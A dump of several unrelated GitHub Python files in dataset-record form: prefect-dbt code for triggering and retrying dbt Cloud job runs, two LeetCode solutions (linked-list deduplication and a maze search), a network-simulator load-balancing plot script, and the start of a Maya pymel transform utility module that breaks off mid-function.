errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact_future = await get_dbt_cloud_run_artifact.with_options(\n retries=0, retry_delay_seconds=0\n ).submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n path=\"run_results.json\",\n step=run_step[\"index\"],\n )\n run_artifact = await run_artifact_future.result()\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes for those run commands\n run_results = run_artifact[\"results\"]\n # select nodes that were not successful\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(\n select_arg\n )\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\"\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(\n exe_command\n )\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n steps_override.append(modified_command)\n\n if trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = trigger_job_run_options.copy()\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n\n@flow(\n name=\"Retry subset of dbt Cloud job run and wait for completion\",\n description=(\n \"Retries a subset of dbt Cloud job run, filtered by select statuses, \"\n \"and waits for the triggered retry to complete.\"\n ),\n)\nasync def retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n run_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n) -> Dict:\n \"\"\"\n Flow that retrys a subset of dbt Cloud job run, filtered by select statuses,\n and waits for the triggered retry to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n run_id: The ID of the job run to retry.\n\n Raises:\n ValueError: If `trigger_job_run_options.steps_override` is set by the user.\n\n Returns:\n The run data returned by the 
dbt Cloud administrative API.\n\n Examples:\n Retry a subset of models in a dbt Cloud job run and wait for completion:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import retry_dbt_cloud_job_run_subset_and_wait_for_completion\n\n @flow\n def retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow():\n credentials = DbtCloudCredentials.load(\"MY_BLOCK_NAME\")\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=credentials,\n run_id=88640123,\n )\n\n retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow()\n ```\n \"\"\" # noqa\n if trigger_job_run_options and trigger_job_run_options.steps_override is not None:\n raise ValueError(\n \"Do not set `steps_override` in `trigger_job_run_options` \"\n \"because this flow will automatically set it\"\n )\n\n run_info_future = await get_dbt_cloud_run_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n include_related=[\"run_steps\"],\n )\n run_info = await run_info_future.result()\n\n job_id = run_info[\"job_id\"]\n job_info_future = await get_dbt_cloud_job_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n )\n job_info = await job_info_future.result()\n\n trigger_job_run_options_override = await _build_trigger_job_run_options(\n dbt_cloud_credentials=dbt_cloud_credentials,\n trigger_job_run_options=trigger_job_run_options,\n run_id=run_id,\n run_info=run_info,\n job_info=job_info,\n )\n\n # to circumvent `RuntimeError: The task runner is already started!`\n flow_run_context = FlowRunContext.get()\n task_runner_type = type(flow_run_context.task_runner)\n\n run_data = await trigger_dbt_cloud_job_run_and_wait_for_completion.with_options(\n task_runner=task_runner_type()\n )(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n retry_filtered_models_attempts=0,\n trigger_job_run_options=trigger_job_run_options_override,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n return run_data\n\n\nclass DbtCloudJobRun(JobRun): # NOT A BLOCK\n \"\"\"\n Class that holds the information and methods to interact\n with the resulting run of a dbt Cloud job.\n \"\"\"\n\n def __init__(self, run_id: int, dbt_cloud_job: \"DbtCloudJob\"):\n self.run_id = run_id\n self._dbt_cloud_job = dbt_cloud_job\n self._dbt_cloud_credentials = dbt_cloud_job.dbt_cloud_credentials\n\n @property\n def _log_prefix(self):\n return f\"dbt Cloud job {self._dbt_cloud_job.job_id} run {self.run_id}.\"\n\n async def _wait_until_state(\n self,\n in_final_state_fn: Awaitable[Callable],\n get_state_fn: Awaitable[Callable],\n log_state_fn: Callable = None,\n timeout_seconds: int = 60,\n interval_seconds: int = 1,\n ):\n \"\"\"\n Wait until the job run reaches a specific state.\n\n Args:\n in_final_state_fn: An async function that accepts a run state\n and returns a boolean indicating whether the job run is\n in a final state.\n get_state_fn: An async function that returns\n the current state of the job run.\n log_state_fn: A callable that accepts a run\n state and makes it human readable.\n timeout_seconds: The maximum amount of time, in seconds, to wait\n for the job run to reach the final state.\n interval_seconds: The number of seconds to wait between checks of\n the job run's state.\n \"\"\"\n start_time = time.time()\n last_state = run_state = None\n while not in_final_state_fn(run_state):\n run_state = await get_state_fn()\n if run_state != last_state:\n if self.logger is 
not None:\n self.logger.info(\n \"%s has new state: %s\",\n self._log_prefix,\n log_state_fn(run_state),\n )\n last_state = run_state\n\n elapsed_time_seconds = time.time() - start_time\n if elapsed_time_seconds > timeout_seconds:\n raise DbtCloudJobRunTimedOut(\n f\"Max wait time of {timeout_seconds} \"\n \"seconds exceeded while waiting\"\n )\n await asyncio.sleep(interval_seconds)\n\n @sync_compatible\n async def get_run(self) -> Dict[str, Any]:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run data.\n\n Returns:\n The run data.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run(self.run_id)\n except HTTPStatusError as ex:\n raise DbtCloudGetRunFailed(extract_user_message(ex)) from ex\n run_data = response.json()[\"data\"]\n return run_data\n\n @sync_compatible\n async def get_status_code(self) -> int:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run status.\n\n Returns:\n The run status code.\n \"\"\"\n run_data = await self.get_run()\n run_status_code = run_data.get(\"status\")\n return run_status_code\n\n @sync_compatible\n async def wait_for_completion(self) -> None:\n \"\"\"\n Waits for the job run to reach a terminal state.\n \"\"\"\n await self._wait_until_state(\n in_final_state_fn=DbtCloudJobRunStatus.is_terminal_status_code,\n get_state_fn=self.get_status_code,\n log_state_fn=DbtCloudJobRunStatus,\n timeout_seconds=self._dbt_cloud_job.timeout_seconds,\n interval_seconds=self._dbt_cloud_job.interval_seconds,\n )\n\n @sync_compatible\n async def fetch_result(self, step: Optional[int] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the results from the job run. Since the results\n may not be ready, use wait_for_completion before calling this method.\n\n Args:\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n \"\"\"\n run_data = await self.get_run()\n run_status = DbtCloudJobRunStatus(run_data.get(\"status\"))\n if run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n async with self._dbt_cloud_credentials.get_administrative_client() as client: # noqa\n response = await client.list_run_artifacts(\n run_id=self.run_id, step=step\n )\n run_data[\"artifact_paths\"] = response.json()[\"data\"]\n self.logger.info(\"%s completed successfully!\", self._log_prefix)\n except HTTPStatusError as ex:\n raise DbtCloudListRunArtifactsFailed(extract_user_message(ex)) from ex\n return run_data\n elif run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(f\"{self._log_prefix} was cancelled.\")\n elif run_status == DbtCloudJobRunStatus.FAILED:\n raise DbtCloudJobRunFailed(f\"{self._log_prefix} has failed.\")\n else:\n raise DbtCloudJobRunIncomplete(\n f\"{self._log_prefix} is still running; \"\n \"use wait_for_completion() to wait until results are ready.\"\n )\n\n @sync_compatible\n async def get_run_artifacts(\n self,\n path: Literal[\"manifest.json\", \"catalog.json\", \"run_results.json\"],\n step: Optional[int] = None,\n ) -> Union[Dict[str, Any], str]:\n \"\"\"\n Get an artifact generated for a completed run.\n\n Args:\n path: The relative path to the run artifact.\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. 
If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n\n Returns:\n The contents of the requested manifest. Returns a `Dict` if the\n requested artifact is a JSON file and a `str` otherwise.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run_artifact(\n run_id=self.run_id, path=path, step=step\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetRunArtifactFailed(extract_user_message(ex)) from ex\n\n if path.endswith(\".json\"):\n artifact_contents = response.json()\n else:\n artifact_contents = response.text\n return artifact_contents\n\n def _select_unsuccessful_commands(\n self,\n run_results: List[Dict[str, Any]],\n command_components: List[str],\n command: str,\n exe_command: str,\n ) -> List[str]:\n \"\"\"\n Select nodes that were not successful and rebuild a command.\n \"\"\"\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(select_arg)\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\" # noqa\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(exe_command)\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n return modified_command\n\n async def _build_trigger_job_run_options(\n self,\n job: Dict[str, Any],\n run: Dict[str, Any],\n ) -> TriggerJobRunOptions:\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job.get(\"generate_docs\", False)\n generate_sources = job.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which 
is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (\n is_exe_command and is_skipped\n ):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact = await self.get_run_artifacts(\n \"run_results.json\", run_step[\"index\"]\n )\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes\n # for those run commands\n run_results = run_artifact[\"results\"]\n modified_command = self._select_unsuccessful_commands(\n run_results=run_results,\n command_components=command_components,\n command=command,\n exe_command=exe_command,\n )\n steps_override.append(modified_command)\n\n if self._dbt_cloud_job.trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = (\n self._dbt_cloud_job.trigger_job_run_options.copy()\n )\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n @sync_compatible\n async def retry_failed_steps(self) -> \"DbtCloudJobRun\": # noqa: F821\n \"\"\"\n Retries steps that did not complete successfully in a run.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n job = await self._dbt_cloud_job.get_job()\n run = await self.get_run()\n\n trigger_job_run_options_override = await self._build_trigger_job_run_options(\n job=job, run=run\n )\n\n num_steps = len(trigger_job_run_options_override.steps_override)\n if num_steps == 0:\n self.logger.info(f\"{self._log_prefix} does not have any steps to retry.\")\n else:\n self.logger.info(f\"{self._log_prefix} has {num_steps} steps to retry.\")\n run = await self._dbt_cloud_job.trigger(\n trigger_job_run_options=trigger_job_run_options_override,\n )\n return run\n\n\nclass DbtCloudJob(JobBlock):\n \"\"\"\n Block that holds the information and methods to interact with a dbt Cloud job.\n\n Attributes:\n dbt_cloud_credentials: The credentials to use to authenticate with dbt Cloud.\n job_id: The id of the dbt Cloud job.\n timeout_seconds: The number of seconds to wait for the job to complete.\n interval_seconds:\n The number of seconds to wait between polling for job completion.\n trigger_job_run_options: The options to use when triggering a job run.\n\n Examples:\n Load a configured dbt Cloud job block.\n ```python\n from prefect_dbt.cloud import DbtCloudJob\n\n dbt_cloud_job = DbtCloudJob.load(\"BLOCK_NAME\")\n ```\n\n Triggers a dbt Cloud job, waits for completion, and fetches the results.\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n\n @flow\n def 
dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob.load(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=154217\n )\n dbt_cloud_job_run = dbt_cloud_job.trigger()\n dbt_cloud_job_run.wait_for_completion()\n dbt_cloud_job_run.fetch_result()\n return dbt_cloud_job_run\n\n dbt_cloud_job_flow()\n ```\n \"\"\"\n\n _block_type_name = \"dbt Cloud Job\"\n _logo_url = \"https://images.ctfassets.net/gm98wzqotmnx/5zE9lxfzBHjw3tnEup4wWL/9a001902ed43a84c6c96d23b24622e19/dbt-bit_tm.png?h=250\" # noqa\n _documentation_url = \"https://prefecthq.github.io/prefect-dbt/cloud/jobs/#prefect_dbt.cloud.jobs.DbtCloudJob\" # noqa\n\n dbt_cloud_credentials: DbtCloudCredentials = Field(\n default=...,\n description=\"The dbt Cloud credentials to use to authenticate with dbt Cloud.\",\n ) # noqa: E501\n job_id: int = Field(\n default=..., description=\"The id of the dbt Cloud job.\", title=\"Job ID\"\n )\n timeout_seconds: int = Field(\n default=900,\n description=\"The number of seconds to wait for the job to complete.\",\n )\n interval_seconds: int = Field(\n default=10,\n description=\"The number of seconds to wait between polling for job completion.\",\n )\n trigger_job_run_options: TriggerJobRunOptions = Field(\n default_factory=TriggerJobRunOptions,\n description=\"The options to use when triggering a job run.\",\n )\n\n @sync_compatible\n async def get_job(self, order_by: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"\n Retrieve information about a dbt Cloud job.\n\n Args:\n order_by: The field to order the results by.\n\n Returns:\n The job data.\n \"\"\"\n try:\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=self.job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n @sync_compatible\n async def trigger(\n self, trigger_job_run_options: Optional[TriggerJobRunOptions] = None\n ) -> DbtCloudJobRun:\n \"\"\"\n Triggers a dbt Cloud job.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n try:\n trigger_job_run_options = (\n trigger_job_run_options or self.trigger_job_run_options\n )\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(\n job_id=self.job_id, options=trigger_job_run_options\n )\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n run_id = run_data.get(\"id\")\n run = DbtCloudJobRun(\n dbt_cloud_job=self,\n run_id=run_id,\n )\n self.logger.info(\n f\"dbt Cloud job {self.job_id} run {run_id} successfully triggered. 
\"\n f\"You can view the status of this run at \"\n f\"https://{self.dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{self.dbt_cloud_credentials.account_id}/projects/\"\n f\"{run_data['project_id']}/runs/{run_id}/\"\n )\n return run\n\n\n@flow\nasync def run_dbt_cloud_job(\n dbt_cloud_job: DbtCloudJob,\n targeted_retries: int = 3,\n) -> Dict[str, Any]:\n \"\"\"\n Flow that triggers and waits for a dbt Cloud job run, retrying a\n subset of failed nodes if necessary.\n\n Args:\n dbt_cloud_job: Block that holds the information and\n methods to interact with a dbt Cloud job.\n targeted_retries: The number of times to retry failed steps.\n\n Examples:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n from prefect_dbt.cloud.jobs import run_dbt_cloud_job\n\n @flow\n def run_dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob(\n dbt_cloud_credentials=dbt_cloud_credentials, job_id=154217\n )\n return run_dbt_cloud_job(dbt_cloud_job=dbt_cloud_job)\n\n run_dbt_cloud_job_flow()\n ```\n \"\"\"\n logger = get_run_logger()\n\n run = await task(dbt_cloud_job.trigger.aio)(dbt_cloud_job)\n while targeted_retries > 0:\n try:\n await task(run.wait_for_completion.aio)(run)\n result = await task(run.fetch_result.aio)(run)\n return result\n except DbtCloudJobRunFailed:\n logger.info(\n f\"Retrying job run with ID: {run.run_id} \"\n f\"{targeted_retries} more times\"\n )\n run = await task(run.retry_failed_steps.aio)(run)\n targeted_retries -= 1\n","repo_name":"PrefectHQ/prefect-dbt","sub_path":"prefect_dbt/cloud/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":43411,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"16"}
+{"seq_id":"22853360377","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head: return None\n\n node = ListNode()\n start = node\n current_val = 101\n\n while head:\n if head.val != current_val:\n node.next = head\n node = node.next\n current_val = head.val\n head = head.next\n node.next = None\n\n return start.next\n","repo_name":"jinhongliu6688/leetcode-algorithms","sub_path":"83-remove-duplicates-from-sorted-list/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70111962889","text":"from multiprocessing import Pool\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.palettes import Category20 as palette\nimport itertools\nimport tqdm\nimport numpy as np\nfrom network_simulator.components import simulator\nfrom network_simulator.helpers import writeSimCache, readSimCache\n\ndef main():\n return simulator(g_init_vars, g_aplist, g_usrlist)\n\ndef loadBalancing(init_vars, aplist, usrlist):\n global g_init_vars, g_aplist, g_usrlist\n\n g_init_vars = init_vars\n g_aplist = aplist\n g_usrlist = usrlist\n \n plot_from_saved = 1\n total_runs = range(20)\n usr_limit = np.arange(30, 120, 5)\n _output = {}\n\n _sim_dict_axes = {\n \"axes1\" : {\n \"param\" : \"No Policy - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes2\" : {\n \"param\" : \"Cheapest Users - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes3\" : {\n \"param\" : \"No Policy - UCB1\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes4\" : {\n \"param\" : \"Cheapest Users - UCB1\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes5\" : {\n \"param\" : \"No Transmission Policy - Shared Evenly\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes6\" : {\n \"param\" : \"Cheapest Users - Shared Evenly\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes7\" : {\n \"param\" : \"No Transmission Policy - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes8\" : {\n \"param\" : \"Cheapest Users - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes9\" : {\n \"param\" : \"No Transmission Policy - AP Energy Use\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes10\" : {\n \"param\" : \"Cheapest Users - AP Energy Use\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes11\" : {\n \"param\" : \"No Transmission Policy - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 4,\n },\n \"axes12\" : {\n \"param\" : \"Cheapest Users - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 4,\n }\n }\n\n if plot_from_saved == 0:\n\n bar = tqdm.tqdm(desc=\"Load Balancing\", total=len(_sim_dict_axes.keys()) * len(usr_limit))\n\n init_vars[\"LOAD_BALANCE\"] = 0\n\n # Run once for no Load Balancing\n for axes in _sim_dict_axes.values():\n\n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n if init_vars[\"SHARE_ENERGY\"] == 6 or init_vars[\"SHARE_ENERGY\"] == 5:\n init_vars[\"SMART_PARAM\"] = axes[\"SMART_PARAM\"]\n\n _avg_serviced_users = []\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users = sum([result.get() for result in _serviced_users]) / len(total_runs)\n _output[axes[\"param\"] + \" No Balancing\"] = { \"result\" : [_avg_serviced_users]*len(usr_limit) }\n bar.update(1)\n init_vars[\"LOAD_BALANCE\"] = 1\n\n for axes in _sim_dict_axes.values():\n \n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n _avg_serviced_users = []\n\n for num in usr_limit:\n init_vars[\"USR_LIMIT\"] = num\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users.append(sum([result.get() for result in _serviced_users]) / len(total_runs))\n\n 
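# keep the averaged serviced-user counts for this policy so they can be plotted below\n 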
_output[axes[\"param\"]] = { \"result\" : _avg_serviced_users }\n bar.update(1)\n bar.close()\n writeSimCache(\"LoadBalanceM\", _output)\n else:\n _output = readSimCache(\"LoadBalanceM\")\n\n output_file(\"interactive/loadbalancing.html\")\n\n TOOLTIPS = [\n (\"(x, y)\", \"($x, $y)\"),\n (\"desc\", \"$name\")\n ]\n \n # Plot colours\n colors = itertools.cycle(palette[12])\n\n p = figure(width=1200, height=800, x_axis_label='Total Number of Users', y_axis_label='Total Number of Serviced Users', tooltips=TOOLTIPS, output_backend='svg')\n count = 0\n\n for key, value in _output.items():\n\n count += 1\n\n print(key + \" : \" + str(sum(value[\"result\"])/len(value[\"result\"])))\n if count >= 13:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3, line_dash=\"dashed\")\n else:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3)\n\n # p.legend[0].orientation = \"vertical\"\n # legend_ref = p.legend[0] \n # p.legend[0] = None\n p.xaxis.axis_label_text_font_size='20px'\n p.xaxis.major_label_text_font_size='20px'\n p.yaxis.axis_label_text_font_size='20px'\n p.yaxis.major_label_text_font_size='20px'\n p.legend.label_text_font_size='18px' \n p.legend[0].orientation = \"vertical\"\n legend_ref = p.legend[0] \n p.add_layout(legend_ref, \"right\")\n\n show(p)\n p.toolbar.logo = None\n p.toolbar_location = None\n\n return p\n","repo_name":"brokenax3/network-simulator-py","sub_path":"network_simulator/test/testLoadBalancing.py","file_name":"testLoadBalancing.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5109407618","text":"# key: memorize the all the stop points\n# time complexity: O(M*N)\n# space complexity: O(M*N)\nimport collections\n\n\nclass Solution(object):\n def hasPath(self, maze, start, destination):\n \"\"\"\n :type maze: List[List[int]]\n :type start: List[int]\n :type destination: List[int]\n :rtype: bool\n \"\"\"\n\n queue = collections.deque([])\n m, n, = len(maze), len(maze[0])\n\n def isWall(pos):\n i, j = pos\n if 0 <= i < m and 0 <= j < n:\n return maze[i][j] == 1\n return True\n\n def bounce(pos):\n i, j = pos\n return list(filter(lambda item: not isWall(item[0]), [[(i-1, j), (-1, 0)], [(i+1, j), (1, 0)], [(i, j-1), (0, -1)], [(i, j+1), (0, 1)]]))\n\n def move(p, d): return (p[0]+d[0], p[1]+d[1])\n visited = {}\n\n queue.extend(bounce(start))\n while queue:\n pos, direct = queue.popleft()\n nxt = move(pos, direct)\n while not isWall(nxt):\n pos = nxt\n nxt = move(nxt, direct)\n\n if tuple(destination) == pos:\n return True\n if visited.get(pos, False):\n continue\n visited[pos] = True\n queue.extend(bounce(pos))\n return False\n","repo_name":"simonzg/leetcode-solutions","sub_path":"490.The_Maze.py","file_name":"490.The_Maze.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2864021672","text":"# -*- coding: utf-8 -*-\n\"\"\"============================================================================\nModule descriptions.\n\n\n__AUTHOR__ = 'minsung'\n__UPDATE__ = 20210707\n\n:Example:\nfrom lib.m_lib import NurbsCurveNode\nreload(NurbsCurveNode)\n\nblah blah blah blah blah blah\nblah blah blah blah blah blah\n============================================================================\"\"\"\n#\n# when start coding 3 empty lines.\n#\nimport math\nfrom pymel import util\nfrom pymel.core import *\nimport maya.OpenMaya as om\nimport pymel.core.datatypes as dt\n\ndef hierarchy_(object_):\n for i,obj in enumerate(object_):\n if i>0:\n parent(obj, object_[i-1])\n\ndef getChildren_(object_, type_=None):\n \"\"\"Get the childrens from top object\n\n Arguments:\n object_ (node): transform node\n type_ (type): node type\n\n Returns:\n list : childrens list\n\n \"\"\"\n object_ = PyNode(object_)\n if not type_:\n type_ = 'transform'\n child_ = object_.listRelatives(ad=1, c=1, typ=type_)\n child_ = child_ + [object_]\n child_.reverse()\n return child_\n\ndef divide_in_two(object_):\n divideNum = int(len(object_)/2)\n items = object_[:divideNum]\n targets = object_[divideNum:]\n return items, targets\n\ndef get_transform(object_):\n _name = object_.name()\n trans = xform(_name, q=1, ws=1, rp=1 )\n rot = xform(_name, q=1, ws=1, ro=1 )\n return trans, rot\n\ndef getTransform(object_):\n return object_.getMatrix(worldSpace=True)\n\ndef set_trans_xform(object_, trans):\n xform(object_, r = 1, t = trans)\n\ndef set_rot_xform(object_, rot):\n xform(object_, r = 1, ro = rot)\n\ndef get_trans(object_):\n return object_.getMatrix(worldSpace=True)[-1][:-1]\n \ndef get_rot(object_):\n return xform(object_, q=1, ws=1, ro=1 )\n\ndef set_transform_(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n pos, rot = get_transform(item)\n set_trans_xform(targets[i], pos)\n set_rot_xform(targets[i], rot)\n\ndef getInverseTransform(object_):\n \"\"\"Get the object_ from inverse matrix\n\n Arguments:\n object_ (node): transform node\n\n Returns:\n matrix : inverse matrix\n\n \"\"\"\n return 